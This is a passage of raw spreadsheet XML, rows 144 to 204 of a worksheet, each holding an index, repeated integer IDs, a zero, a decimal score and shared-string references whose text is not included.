      <c r="H144" t="s">
        <v>292</v>
      </c>
    </row>
    <row r="145" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A145" s="1">
        <v>143</v>
      </c>
      <c r="B145">
        <v>4568</v>
      </c>
      <c r="C145">
        <v>4568</v>
      </c>
      <c r="D145">
        <v>0</v>
      </c>
      <c r="E145">
        <v>0.6656000018119812</v>
      </c>
      <c r="F145" t="s">
        <v>7</v>
      </c>
      <c r="G145" t="s">
        <v>293</v>
      </c>
      <c r="H145" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="146" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A146" s="1">
        <v>144</v>
      </c>
      <c r="B146">
        <v>7085</v>
      </c>
      <c r="C146">
        <v>7085</v>
      </c>
      <c r="D146">
        <v>0</v>
      </c>
      <c r="E146">
        <v>0.99800002574920654</v>
      </c>
      <c r="F146" t="s">
        <v>7</v>
      </c>
      <c r="G146" t="s">
        <v>295</v>
      </c>
      <c r="H146" t="s">
        <v>296</v>
      </c>
    </row>
    <row r="147" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A147" s="1">
        <v>145</v>
      </c>
      <c r="B147">
        <v>1910</v>
      </c>
      <c r="C147">
        <v>1910</v>
      </c>
      <c r="D147">
        <v>0</v>
      </c>
      <c r="E147">
        <v>0.79759997129440308</v>
      </c>
      <c r="F147" t="s">
        <v>7</v>
      </c>
      <c r="G147" t="s">
        <v>297</v>
      </c>
      <c r="H147" t="s">
        <v>181</v>
      </c>
    </row>
    <row r="148" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A148" s="1">
        <v>146</v>
      </c>
      <c r="B148">
        <v>1911</v>
      </c>
      <c r="C148">
        <v>1911</v>
      </c>
      <c r="D148">
        <v>0</v>
      </c>
      <c r="E148">
        <v>0.87059998512268066</v>
      </c>
      <c r="F148" t="s">
        <v>7</v>
      </c>
      <c r="G148" t="s">
        <v>298</v>
      </c>
      <c r="H148" t="s">
        <v>299</v>
      </c>
    </row>
    <row r="149" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A149" s="1">
        <v>147</v>
      </c>
      <c r="B149">
        <v>1912</v>
      </c>
      <c r="C149">
        <v>1912</v>
      </c>
      <c r="D149">
        <v>0</v>
      </c>
      <c r="E149">
        <v>0.84820002317428589</v>
      </c>
      <c r="F149" t="s">
        <v>7</v>
      </c>
      <c r="G149" t="s">
        <v>300</v>
      </c>
      <c r="H149" t="s">
        <v>301</v>
      </c>
    </row>
    <row r="150" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A150" s="1">
        <v>148</v>
      </c>
      <c r="B150">
        <v>1915</v>
      </c>
      <c r="C150">
        <v>1915</v>
      </c>
      <c r="D150">
        <v>0</v>
      </c>
      <c r="E150">
        <v>0.53140002489089966</v>
      </c>
      <c r="F150" t="s">
        <v>7</v>
      </c>
      <c r="G150" t="s">
        <v>302</v>
      </c>
      <c r="H150" t="s">
        <v>303</v>
      </c>
    </row>
    <row r="151" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A151" s="1">
        <v>149</v>
      </c>
      <c r="B151">
        <v>1920</v>
      </c>
      <c r="C151">
        <v>1920</v>
      </c>
      <c r="D151">
        <v>0</v>
      </c>
      <c r="E151">
        <v>0.85369998216629028</v>
      </c>
      <c r="F151" t="s">
        <v>7</v>
      </c>
      <c r="G151" t="s">
        <v>304</v>
      </c>
      <c r="H151" t="s">
        <v>305</v>
      </c>
    </row>
    <row r="152" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A152" s="1">
        <v>150</v>
      </c>
      <c r="B152">
        <v>7078</v>
      </c>
      <c r="C152">
        <v>7078</v>
      </c>
      <c r="D152">
        <v>0</v>
      </c>
      <c r="E152">
        <v>0.99900001287460327</v>
      </c>
      <c r="F152" t="s">
        <v>7</v>
      </c>
      <c r="G152" t="s">
        <v>306</v>
      </c>
      <c r="H152" t="s">
        <v>307</v>
      </c>
    </row>
    <row r="153" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A153" s="1">
        <v>151</v>
      </c>
      <c r="B153">
        <v>7077</v>
      </c>
      <c r="C153">
        <v>7077</v>
      </c>
      <c r="D153">
        <v>0</v>
      </c>
      <c r="E153">
        <v>0.99659997224807739</v>
      </c>
      <c r="F153" t="s">
        <v>7</v>
      </c>
      <c r="G153" t="s">
        <v>308</v>
      </c>
      <c r="H153" t="s">
        <v>309</v>
      </c>
    </row>
    <row r="154" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A154" s="1">
        <v>152</v>
      </c>
      <c r="B154">
        <v>7076</v>
      </c>
      <c r="C154">
        <v>7076</v>
      </c>
      <c r="D154">
        <v>0</v>
      </c>
      <c r="E154">
        <v>0.99919998645782471</v>
      </c>
      <c r="F154" t="s">
        <v>7</v>
      </c>
      <c r="G154" t="s">
        <v>310</v>
      </c>
      <c r="H154" t="s">
        <v>311</v>
      </c>
    </row>
    <row r="155" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A155" s="1">
        <v>153</v>
      </c>
      <c r="B155">
        <v>7075</v>
      </c>
      <c r="C155">
        <v>7075</v>
      </c>
      <c r="D155">
        <v>0</v>
      </c>
      <c r="E155">
        <v>0.99900001287460327</v>
      </c>
      <c r="F155" t="s">
        <v>7</v>
      </c>
      <c r="G155" t="s">
        <v>312</v>
      </c>
      <c r="H155" t="s">
        <v>313</v>
      </c>
    </row>
    <row r="156" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A156" s="1">
        <v>154</v>
      </c>
      <c r="B156">
        <v>1927</v>
      </c>
      <c r="C156">
        <v>1927</v>
      </c>
      <c r="D156">
        <v>0</v>
      </c>
      <c r="E156">
        <v>0.40329998731613159</v>
      </c>
      <c r="F156" t="s">
        <v>7</v>
      </c>
      <c r="G156" t="s">
        <v>314</v>
      </c>
      <c r="H156" t="s">
        <v>315</v>
      </c>
    </row>
    <row r="157" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A157" s="1">
        <v>155</v>
      </c>
      <c r="B157">
        <v>1928</v>
      </c>
      <c r="C157">
        <v>1928</v>
      </c>
      <c r="D157">
        <v>0</v>
      </c>
      <c r="E157">
        <v>0.92409998178482056</v>
      </c>
      <c r="F157" t="s">
        <v>7</v>
      </c>
      <c r="G157" t="s">
        <v>316</v>
      </c>
      <c r="H157" t="s">
        <v>317</v>
      </c>
    </row>
    <row r="158" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A158" s="1">
        <v>156</v>
      </c>
      <c r="B158">
        <v>7074</v>
      </c>
      <c r="C158">
        <v>7074</v>
      </c>
      <c r="D158">
        <v>0</v>
      </c>
      <c r="E158">
        <v>0.99959999322891235</v>
      </c>
      <c r="F158" t="s">
        <v>7</v>
      </c>
      <c r="G158" t="s">
        <v>318</v>
      </c>
      <c r="H158" t="s">
        <v>319</v>
      </c>
    </row>
    <row r="159" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A159" s="1">
        <v>157</v>
      </c>
      <c r="B159">
        <v>5969</v>
      </c>
      <c r="C159">
        <v>5969</v>
      </c>
      <c r="D159">
        <v>0</v>
      </c>
      <c r="E159">
        <v>0.57359999418258667</v>
      </c>
      <c r="F159" t="s">
        <v>7</v>
      </c>
      <c r="G159" t="s">
        <v>320</v>
      </c>
      <c r="H159" t="s">
        <v>321</v>
      </c>
    </row>
    <row r="160" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A160" s="1">
        <v>158</v>
      </c>
      <c r="B160">
        <v>2129</v>
      </c>
      <c r="C160">
        <v>2129</v>
      </c>
      <c r="D160">
        <v>0</v>
      </c>
      <c r="E160">
        <v>0.89709997177124023</v>
      </c>
      <c r="F160" t="s">
        <v>7</v>
      </c>
      <c r="G160" t="s">
        <v>322</v>
      </c>
      <c r="H160" t="s">
        <v>323</v>
      </c>
    </row>
    <row r="161" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A161" s="1">
        <v>159</v>
      </c>
      <c r="B161">
        <v>2130</v>
      </c>
      <c r="C161">
        <v>2130</v>
      </c>
      <c r="D161">
        <v>0</v>
      </c>
      <c r="E161">
        <v>0.73849999904632568</v>
      </c>
      <c r="F161" t="s">
        <v>7</v>
      </c>
      <c r="G161" t="s">
        <v>324</v>
      </c>
      <c r="H161" t="s">
        <v>325</v>
      </c>
    </row>
    <row r="162" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A162" s="1">
        <v>160</v>
      </c>
      <c r="B162">
        <v>2131</v>
      </c>
      <c r="C162">
        <v>2131</v>
      </c>
      <c r="D162">
        <v>0</v>
      </c>
      <c r="E162">
        <v>0.50180000066757202</v>
      </c>
      <c r="F162" t="s">
        <v>7</v>
      </c>
      <c r="G162" t="s">
        <v>326</v>
      </c>
      <c r="H162" t="s">
        <v>327</v>
      </c>
    </row>
    <row r="163" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A163" s="1">
        <v>161</v>
      </c>
      <c r="B163">
        <v>6982</v>
      </c>
      <c r="C163">
        <v>6982</v>
      </c>
      <c r="D163">
        <v>0</v>
      </c>
      <c r="E163">
        <v>0.50749999284744263</v>
      </c>
      <c r="F163" t="s">
        <v>7</v>
      </c>
      <c r="G163" t="s">
        <v>328</v>
      </c>
      <c r="H163" t="s">
        <v>329</v>
      </c>
    </row>
    <row r="164" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A164" s="1">
        <v>162</v>
      </c>
      <c r="B164">
        <v>2316</v>
      </c>
      <c r="C164">
        <v>2316</v>
      </c>
      <c r="D164">
        <v>0</v>
      </c>
      <c r="E164">
        <v>0.90329998731613159</v>
      </c>
      <c r="F164" t="s">
        <v>7</v>
      </c>
      <c r="G164" t="s">
        <v>330</v>
      </c>
      <c r="H164" t="s">
        <v>331</v>
      </c>
    </row>
    <row r="165" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A165" s="1">
        <v>163</v>
      </c>
      <c r="B165">
        <v>2317</v>
      </c>
      <c r="C165">
        <v>2317</v>
      </c>
      <c r="D165">
        <v>0</v>
      </c>
      <c r="E165">
        <v>0.38339999318122858</v>
      </c>
      <c r="F165" t="s">
        <v>7</v>
      </c>
      <c r="G165" t="s">
        <v>332</v>
      </c>
      <c r="H165" t="s">
        <v>333</v>
      </c>
    </row>
    <row r="166" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A166" s="1">
        <v>164</v>
      </c>
      <c r="B166">
        <v>6886</v>
      </c>
      <c r="C166">
        <v>6886</v>
      </c>
      <c r="D166">
        <v>0</v>
      </c>
      <c r="E166">
        <v>0.84560000896453857</v>
      </c>
      <c r="F166" t="s">
        <v>7</v>
      </c>
      <c r="G166" t="s">
        <v>334</v>
      </c>
      <c r="H166" t="s">
        <v>335</v>
      </c>
    </row>
    <row r="167" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A167" s="1">
        <v>165</v>
      </c>
      <c r="B167">
        <v>2319</v>
      </c>
      <c r="C167">
        <v>2319</v>
      </c>
      <c r="D167">
        <v>0</v>
      </c>
      <c r="E167">
        <v>0.97009998559951782</v>
      </c>
      <c r="F167" t="s">
        <v>7</v>
      </c>
      <c r="G167" t="s">
        <v>336</v>
      </c>
      <c r="H167" t="s">
        <v>337</v>
      </c>
    </row>
    <row r="168" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A168" s="1">
        <v>166</v>
      </c>
      <c r="B168">
        <v>2321</v>
      </c>
      <c r="C168">
        <v>2321</v>
      </c>
      <c r="D168">
        <v>0</v>
      </c>
      <c r="E168">
        <v>0.55349999666213989</v>
      </c>
      <c r="F168" t="s">
        <v>7</v>
      </c>
      <c r="G168" t="s">
        <v>338</v>
      </c>
      <c r="H168" t="s">
        <v>339</v>
      </c>
    </row>
    <row r="169" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A169" s="1">
        <v>167</v>
      </c>
      <c r="B169">
        <v>6884</v>
      </c>
      <c r="C169">
        <v>6884</v>
      </c>
      <c r="D169">
        <v>0</v>
      </c>
      <c r="E169">
        <v>0.83359998464584351</v>
      </c>
      <c r="F169" t="s">
        <v>7</v>
      </c>
      <c r="G169" t="s">
        <v>340</v>
      </c>
      <c r="H169" t="s">
        <v>341</v>
      </c>
    </row>
    <row r="170" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A170" s="1">
        <v>168</v>
      </c>
      <c r="B170">
        <v>2325</v>
      </c>
      <c r="C170">
        <v>2325</v>
      </c>
      <c r="D170">
        <v>0</v>
      </c>
      <c r="E170">
        <v>0.65770000219345093</v>
      </c>
      <c r="F170" t="s">
        <v>7</v>
      </c>
      <c r="G170" t="s">
        <v>342</v>
      </c>
      <c r="H170" t="s">
        <v>343</v>
      </c>
    </row>
    <row r="171" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A171" s="1">
        <v>169</v>
      </c>
      <c r="B171">
        <v>2315</v>
      </c>
      <c r="C171">
        <v>2315</v>
      </c>
      <c r="D171">
        <v>0</v>
      </c>
      <c r="E171">
        <v>0.90359997749328613</v>
      </c>
      <c r="F171" t="s">
        <v>7</v>
      </c>
      <c r="G171" t="s">
        <v>344</v>
      </c>
      <c r="H171" t="s">
        <v>331</v>
      </c>
    </row>
    <row r="172" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A172" s="1">
        <v>170</v>
      </c>
      <c r="B172">
        <v>6883</v>
      </c>
      <c r="C172">
        <v>6883</v>
      </c>
      <c r="D172">
        <v>0</v>
      </c>
      <c r="E172">
        <v>0.95740002393722534</v>
      </c>
      <c r="F172" t="s">
        <v>7</v>
      </c>
      <c r="G172" t="s">
        <v>345</v>
      </c>
      <c r="H172" t="s">
        <v>346</v>
      </c>
    </row>
    <row r="173" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A173" s="1">
        <v>171</v>
      </c>
      <c r="B173">
        <v>2328</v>
      </c>
      <c r="C173">
        <v>2328</v>
      </c>
      <c r="D173">
        <v>0</v>
      </c>
      <c r="E173">
        <v>0.98540002107620239</v>
      </c>
      <c r="F173" t="s">
        <v>7</v>
      </c>
      <c r="G173" t="s">
        <v>347</v>
      </c>
      <c r="H173" t="s">
        <v>348</v>
      </c>
    </row>
    <row r="174" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A174" s="1">
        <v>172</v>
      </c>
      <c r="B174">
        <v>6071</v>
      </c>
      <c r="C174">
        <v>6071</v>
      </c>
      <c r="D174">
        <v>0</v>
      </c>
      <c r="E174">
        <v>0.88999998569488525</v>
      </c>
      <c r="F174" t="s">
        <v>7</v>
      </c>
      <c r="G174" t="s">
        <v>349</v>
      </c>
      <c r="H174" t="s">
        <v>350</v>
      </c>
    </row>
    <row r="175" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A175" s="1">
        <v>173</v>
      </c>
      <c r="B175">
        <v>6882</v>
      </c>
      <c r="C175">
        <v>6882</v>
      </c>
      <c r="D175">
        <v>0</v>
      </c>
      <c r="E175">
        <v>0.4392000138759613</v>
      </c>
      <c r="F175" t="s">
        <v>7</v>
      </c>
      <c r="G175" t="s">
        <v>351</v>
      </c>
      <c r="H175" t="s">
        <v>352</v>
      </c>
    </row>
    <row r="176" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A176" s="1">
        <v>174</v>
      </c>
      <c r="B176">
        <v>2333</v>
      </c>
      <c r="C176">
        <v>2333</v>
      </c>
      <c r="D176">
        <v>0</v>
      </c>
      <c r="E176">
        <v>0.4595000147819519</v>
      </c>
      <c r="F176" t="s">
        <v>7</v>
      </c>
      <c r="G176" t="s">
        <v>353</v>
      </c>
      <c r="H176" t="s">
        <v>354</v>
      </c>
    </row>
    <row r="177" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A177" s="1">
        <v>175</v>
      </c>
      <c r="B177">
        <v>2335</v>
      </c>
      <c r="C177">
        <v>2335</v>
      </c>
      <c r="D177">
        <v>0</v>
      </c>
      <c r="E177">
        <v>0.60180002450942993</v>
      </c>
      <c r="F177" t="s">
        <v>7</v>
      </c>
      <c r="G177" t="s">
        <v>355</v>
      </c>
      <c r="H177" t="s">
        <v>356</v>
      </c>
    </row>
    <row r="178" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A178" s="1">
        <v>176</v>
      </c>
      <c r="B178">
        <v>2336</v>
      </c>
      <c r="C178">
        <v>2336</v>
      </c>
      <c r="D178">
        <v>0</v>
      </c>
      <c r="E178">
        <v>0.73970001935958862</v>
      </c>
      <c r="F178" t="s">
        <v>7</v>
      </c>
      <c r="G178" t="s">
        <v>357</v>
      </c>
      <c r="H178" t="s">
        <v>358</v>
      </c>
    </row>
    <row r="179" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A179" s="1">
        <v>177</v>
      </c>
      <c r="B179">
        <v>2337</v>
      </c>
      <c r="C179">
        <v>2337</v>
      </c>
      <c r="D179">
        <v>0</v>
      </c>
      <c r="E179">
        <v>0.7807999849319458</v>
      </c>
      <c r="F179" t="s">
        <v>7</v>
      </c>
      <c r="G179" t="s">
        <v>359</v>
      </c>
      <c r="H179" t="s">
        <v>360</v>
      </c>
    </row>
    <row r="180" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A180" s="1">
        <v>178</v>
      </c>
      <c r="B180">
        <v>4349</v>
      </c>
      <c r="C180">
        <v>4349</v>
      </c>
      <c r="D180">
        <v>0</v>
      </c>
      <c r="E180">
        <v>0.9966999888420105</v>
      </c>
      <c r="F180" t="s">
        <v>7</v>
      </c>
      <c r="G180" t="s">
        <v>361</v>
      </c>
      <c r="H180" t="s">
        <v>362</v>
      </c>
    </row>
    <row r="181" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A181" s="1">
        <v>179</v>
      </c>
      <c r="B181">
        <v>2338</v>
      </c>
      <c r="C181">
        <v>2338</v>
      </c>
      <c r="D181">
        <v>0</v>
      </c>
      <c r="E181">
        <v>0.61540001630783081</v>
      </c>
      <c r="F181" t="s">
        <v>7</v>
      </c>
      <c r="G181" t="s">
        <v>363</v>
      </c>
      <c r="H181" t="s">
        <v>364</v>
      </c>
    </row>
    <row r="182" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A182" s="1">
        <v>180</v>
      </c>
      <c r="B182">
        <v>2314</v>
      </c>
      <c r="C182">
        <v>2314</v>
      </c>
      <c r="D182">
        <v>0</v>
      </c>
      <c r="E182">
        <v>0.47580000758171082</v>
      </c>
      <c r="F182" t="s">
        <v>7</v>
      </c>
      <c r="G182" t="s">
        <v>365</v>
      </c>
      <c r="H182" t="s">
        <v>366</v>
      </c>
    </row>
    <row r="183" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A183" s="1">
        <v>181</v>
      </c>
      <c r="B183">
        <v>2308</v>
      </c>
      <c r="C183">
        <v>2308</v>
      </c>
      <c r="D183">
        <v>0</v>
      </c>
      <c r="E183">
        <v>0.99730002880096436</v>
      </c>
      <c r="F183" t="s">
        <v>7</v>
      </c>
      <c r="G183" t="s">
        <v>367</v>
      </c>
      <c r="H183" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="184" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A184" s="1">
        <v>182</v>
      </c>
      <c r="B184">
        <v>6063</v>
      </c>
      <c r="C184">
        <v>6063</v>
      </c>
      <c r="D184">
        <v>0</v>
      </c>
      <c r="E184">
        <v>0.4293999969959259</v>
      </c>
      <c r="F184" t="s">
        <v>7</v>
      </c>
      <c r="G184" t="s">
        <v>369</v>
      </c>
      <c r="H184" t="s">
        <v>370</v>
      </c>
    </row>
    <row r="185" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A185" s="1">
        <v>183</v>
      </c>
      <c r="B185">
        <v>2283</v>
      </c>
      <c r="C185">
        <v>2283</v>
      </c>
      <c r="D185">
        <v>0</v>
      </c>
      <c r="E185">
        <v>0.83149999380111694</v>
      </c>
      <c r="F185" t="s">
        <v>7</v>
      </c>
      <c r="G185" t="s">
        <v>371</v>
      </c>
      <c r="H185" t="s">
        <v>372</v>
      </c>
    </row>
    <row r="186" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A186" s="1">
        <v>184</v>
      </c>
      <c r="B186">
        <v>2284</v>
      </c>
      <c r="C186">
        <v>2284</v>
      </c>
      <c r="D186">
        <v>0</v>
      </c>
      <c r="E186">
        <v>0.93389999866485596</v>
      </c>
      <c r="F186" t="s">
        <v>7</v>
      </c>
      <c r="G186" t="s">
        <v>373</v>
      </c>
      <c r="H186" t="s">
        <v>374</v>
      </c>
    </row>
    <row r="187" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A187" s="1">
        <v>185</v>
      </c>
      <c r="B187">
        <v>4365</v>
      </c>
      <c r="C187">
        <v>4365</v>
      </c>
      <c r="D187">
        <v>0</v>
      </c>
      <c r="E187">
        <v>0.75150001049041748</v>
      </c>
      <c r="F187" t="s">
        <v>7</v>
      </c>
      <c r="G187" t="s">
        <v>375</v>
      </c>
      <c r="H187" t="s">
        <v>376</v>
      </c>
    </row>
    <row r="188" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A188" s="1">
        <v>186</v>
      </c>
      <c r="B188">
        <v>2288</v>
      </c>
      <c r="C188">
        <v>2288</v>
      </c>
      <c r="D188">
        <v>0</v>
      </c>
      <c r="E188">
        <v>0.97130000591278076</v>
      </c>
      <c r="F188" t="s">
        <v>7</v>
      </c>
      <c r="G188" t="s">
        <v>377</v>
      </c>
      <c r="H188" t="s">
        <v>378</v>
      </c>
    </row>
    <row r="189" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A189" s="1">
        <v>187</v>
      </c>
      <c r="B189">
        <v>4364</v>
      </c>
      <c r="C189">
        <v>4364</v>
      </c>
      <c r="D189">
        <v>0</v>
      </c>
      <c r="E189">
        <v>0.99980002641677856</v>
      </c>
      <c r="F189" t="s">
        <v>7</v>
      </c>
      <c r="G189" t="s">
        <v>379</v>
      </c>
      <c r="H189" t="s">
        <v>380</v>
      </c>
    </row>
    <row r="190" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A190" s="1">
        <v>188</v>
      </c>
      <c r="B190">
        <v>4363</v>
      </c>
      <c r="C190">
        <v>4363</v>
      </c>
      <c r="D190">
        <v>0</v>
      </c>
      <c r="E190">
        <v>0.9122999906539917</v>
      </c>
      <c r="F190" t="s">
        <v>7</v>
      </c>
      <c r="G190" t="s">
        <v>381</v>
      </c>
      <c r="H190" t="s">
        <v>382</v>
      </c>
    </row>
    <row r="191" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A191" s="1">
        <v>189</v>
      </c>
      <c r="B191">
        <v>2312</v>
      </c>
      <c r="C191">
        <v>2312</v>
      </c>
      <c r="D191">
        <v>0</v>
      </c>
      <c r="E191">
        <v>0.65630000829696655</v>
      </c>
      <c r="F191" t="s">
        <v>7</v>
      </c>
      <c r="G191" t="s">
        <v>383</v>
      </c>
      <c r="H191" t="s">
        <v>384</v>
      </c>
    </row>
    <row r="192" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A192" s="1">
        <v>190</v>
      </c>
      <c r="B192">
        <v>4362</v>
      </c>
      <c r="C192">
        <v>4362</v>
      </c>
      <c r="D192">
        <v>0</v>
      </c>
      <c r="E192">
        <v>0.99879997968673706</v>
      </c>
      <c r="F192" t="s">
        <v>7</v>
      </c>
      <c r="G192" t="s">
        <v>385</v>
      </c>
      <c r="H192" t="s">
        <v>386</v>
      </c>
    </row>
    <row r="193" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A193" s="1">
        <v>191</v>
      </c>
      <c r="B193">
        <v>6893</v>
      </c>
      <c r="C193">
        <v>6893</v>
      </c>
      <c r="D193">
        <v>0</v>
      </c>
      <c r="E193">
        <v>0.65090000629425049</v>
      </c>
      <c r="F193" t="s">
        <v>7</v>
      </c>
      <c r="G193" t="s">
        <v>387</v>
      </c>
      <c r="H193" t="s">
        <v>388</v>
      </c>
    </row>
    <row r="194" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A194" s="1">
        <v>192</v>
      </c>
      <c r="B194">
        <v>2298</v>
      </c>
      <c r="C194">
        <v>2298</v>
      </c>
      <c r="D194">
        <v>0</v>
      </c>
      <c r="E194">
        <v>0.57099997997283936</v>
      </c>
      <c r="F194" t="s">
        <v>7</v>
      </c>
      <c r="G194" t="s">
        <v>389</v>
      </c>
      <c r="H194" t="s">
        <v>390</v>
      </c>
    </row>
    <row r="195" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A195" s="1">
        <v>193</v>
      </c>
      <c r="B195">
        <v>2301</v>
      </c>
      <c r="C195">
        <v>2301</v>
      </c>
      <c r="D195">
        <v>0</v>
      </c>
      <c r="E195">
        <v>0.99830001592636108</v>
      </c>
      <c r="F195" t="s">
        <v>7</v>
      </c>
      <c r="G195" t="s">
        <v>391</v>
      </c>
      <c r="H195" t="s">
        <v>392</v>
      </c>
    </row>
    <row r="196" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A196" s="1">
        <v>194</v>
      </c>
      <c r="B196">
        <v>6890</v>
      </c>
      <c r="C196">
        <v>6890</v>
      </c>
      <c r="D196">
        <v>0</v>
      </c>
      <c r="E196">
        <v>0.99800002574920654</v>
      </c>
      <c r="F196" t="s">
        <v>7</v>
      </c>
      <c r="G196" t="s">
        <v>393</v>
      </c>
      <c r="H196" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="197" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A197" s="1">
        <v>195</v>
      </c>
      <c r="B197">
        <v>6889</v>
      </c>
      <c r="C197">
        <v>6889</v>
      </c>
      <c r="D197">
        <v>0</v>
      </c>
      <c r="E197">
        <v>0.41679999232292181</v>
      </c>
      <c r="F197" t="s">
        <v>7</v>
      </c>
      <c r="G197" t="s">
        <v>394</v>
      </c>
      <c r="H197" t="s">
        <v>395</v>
      </c>
    </row>
    <row r="198" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A198" s="1">
        <v>196</v>
      </c>
      <c r="B198">
        <v>2305</v>
      </c>
      <c r="C198">
        <v>2305</v>
      </c>
      <c r="D198">
        <v>0</v>
      </c>
      <c r="E198">
        <v>0.71240001916885376</v>
      </c>
      <c r="F198" t="s">
        <v>7</v>
      </c>
      <c r="G198" t="s">
        <v>396</v>
      </c>
      <c r="H198" t="s">
        <v>397</v>
      </c>
    </row>
    <row r="199" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A199" s="1">
        <v>197</v>
      </c>
      <c r="B199">
        <v>2307</v>
      </c>
      <c r="C199">
        <v>2307</v>
      </c>
      <c r="D199">
        <v>0</v>
      </c>
      <c r="E199">
        <v>0.44960001111030579</v>
      </c>
      <c r="F199" t="s">
        <v>7</v>
      </c>
      <c r="G199" t="s">
        <v>398</v>
      </c>
      <c r="H199" t="s">
        <v>399</v>
      </c>
    </row>
    <row r="200" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A200" s="1">
        <v>198</v>
      </c>
      <c r="B200">
        <v>6894</v>
      </c>
      <c r="C200">
        <v>6894</v>
      </c>
      <c r="D200">
        <v>0</v>
      </c>
      <c r="E200">
        <v>0.68250000476837158</v>
      </c>
      <c r="F200" t="s">
        <v>7</v>
      </c>
      <c r="G200" t="s">
        <v>400</v>
      </c>
      <c r="H200" t="s">
        <v>401</v>
      </c>
    </row>
    <row r="201" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A201" s="1">
        <v>199</v>
      </c>
      <c r="B201">
        <v>4342</v>
      </c>
      <c r="C201">
        <v>4342</v>
      </c>
      <c r="D201">
        <v>0</v>
      </c>
      <c r="E201">
        <v>0.9976000189781189</v>
      </c>
      <c r="F201" t="s">
        <v>7</v>
      </c>
      <c r="G201" t="s">
        <v>402</v>
      </c>
      <c r="H201" t="s">
        <v>403</v>
      </c>
    </row>
    <row r="202" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A202" s="1">
        <v>200</v>
      </c>
      <c r="B202">
        <v>4341</v>
      </c>
      <c r="C202">
        <v>4341</v>
      </c>
      <c r="D202">
        <v>0</v>
      </c>
      <c r="E202">
        <v>0.65469998121261597</v>
      </c>
      <c r="F202" t="s">
        <v>7</v>
      </c>
      <c r="G202" t="s">
        <v>404</v>
      </c>
      <c r="H202" t="s">
        <v>405</v>
      </c>
    </row>
    <row r="203" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A203" s="1">
        <v>201</v>
      </c>
      <c r="B203">
        <v>6875</v>
      </c>
      <c r="C203">
        <v>6875</v>
      </c>
      <c r="D203">
        <v>0</v>
      </c>
      <c r="E203">
        <v>0.9976000189781189</v>
      </c>
      <c r="F203" t="s">
        <v>7</v>
      </c>
      <c r="G203" t="s">
        <v>406</v>
      </c>
      <c r="H203" t="s">
        <v>407</v>
      </c>
    </row>
    <row r="204" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A204" s="1">
        <v>202</v>
      </c>
      <c r="B204">
        <v>4307</v>
      </c>
      <c r="C204">
        <v>4307</v>
      </c>
      <c r="D204">
        <v>0</v>
      </c>
      <c r="E204">
        <v>0.59680002927780151</v>
      </c>
      <c r="F204" t="s">
        <v>7</v>
      </c>
      <c r="G204" t="s">
        <v>408</v>
      </c>
      <c r="H204" t="s">
        <v>409</v>
      </c>
    </row>
    <row r="205" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A205" s="1">
        <v>203</v>
      </c>
      <c r="B205">
        <v>2396</v>
      </c>
      <c r="C205">
        <v>2396</v>
      </c>
      <c r="D205">
        <v>0</v>
      </c>
      <c r="E205">
        <v>0.77829998731613159</v>
      </c>
      <c r="F205" t="s">
        <v>7</v>
      </c>
      <c r="G205" t="s">
        <v>410</v>
      </c>
      <c r="H205" t="s">
        <v>411</v>
      </c>
    </row>
    <row r="206" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A206" s="1">
        <v>204</v>
      </c>
      <c r="B206">
        <v>4304</v>
      </c>
